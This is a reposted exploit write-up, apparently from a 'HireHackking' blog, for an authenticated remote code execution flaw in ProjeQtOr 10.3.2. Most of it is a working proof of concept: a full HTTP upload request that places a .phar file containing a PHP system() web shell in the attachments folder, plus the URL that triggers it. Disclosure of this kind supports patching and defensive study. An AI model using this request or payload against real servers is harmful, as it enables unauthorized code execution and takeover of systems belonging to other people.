Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863561906

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: ProjeQtOr Project Management System 10.3.2   -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again

Payload:<?php echo system("id"); ?>

poc request:


POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream

<?php echo system("id"); ?>

------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"

User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"

file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"

html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--




visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar